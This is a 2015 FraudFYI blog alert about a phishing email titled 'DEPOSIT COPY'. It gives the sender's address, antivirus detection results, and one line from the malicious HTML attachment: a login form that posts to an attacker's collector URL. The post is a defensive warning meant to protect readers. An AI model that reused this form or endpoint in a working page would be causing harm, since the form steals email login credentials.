Search FraudFYI

Saturday, October 10, 2015

MALWARE/PHISHING ALERT! MALWARE PHISHING email from Zahra Suleiman Barde callzarazee@gmail.com

DO NOT OPEN THE .HTML FILE ATTACHED TO THIS EMAIL!  NOT ONLY IS IT PHISHING FOR YOUR EMAIL LOG-IN AND PASSWORD, BUT 7 SCANNING ENGINES HAVE ALSO IDENTIFIED THIS FILE AS POSSIBLY CONTAINING MALWARE THAT MAY BE HARMFUL TO YOUR COMPUTER!  The .html file is posting to http://googdc.hj.cx/9vO0Lk2BX8vV7jMX2MLEsIM9ddw11feM3Sjp3ijUOUFK/vfw.php - NO LEGITIMATE COMPANY WOULD REQUIRE YOUR EMAIL LOG-IN TO VIEW A DOCUMENT!

Per VirusTotal.com:

File name:     Scan001.html
Detection ratio:     7 / 55
Analysis date:     2015-10-10 11:01:58 UTC

AVG     JS/Phish     20151010
Avast     JS:Agent-DOI [Trj]     20151010
Fortinet     HTML/Phish.A!tr     20151010
Ikarus     Trojan.HTML.Phishbank     20151010
NANO-Antivirus     Trojan.Script.Heuristic-js.iacgm     20151010
Qihoo-360     htm.obfs.ar.gen     20151010
Sophos     Mal/Phish-A     20151010
If you have downloaded and opened this file, run a full virus scan as soon as possible.  You can download free versions from safe websites such as https://www.malwarebytes.org/ and http://free.avg.com/us-en/homepage

from: Zahra Suleiman Barde <callzarazee@gmail.com> 
to: 
bcc: 
date: Fri, Oct 9, 2015 at 3:13 PM
subject: DEPOSIT COPY
mailed-by: gmail.com
signed-by: gmail.com

Dear sir/madam,

Please see the attached confirmation copy. Payment has been made to you based on instruction from our customer.

Kind regards

attachment; filename="Scan001.html"
<form name="index2" method="post" action="http://googdc.hj.cx/9vO0Lk2BX8vV7jMX2MLEsIM9ddw11feM3Sjp3ijUOUFK/vfw.php" onSubmit="return(signOn());">

No comments:

Post a Comment

Thank you for commenting! Your comment will be reviewed and posted shortly!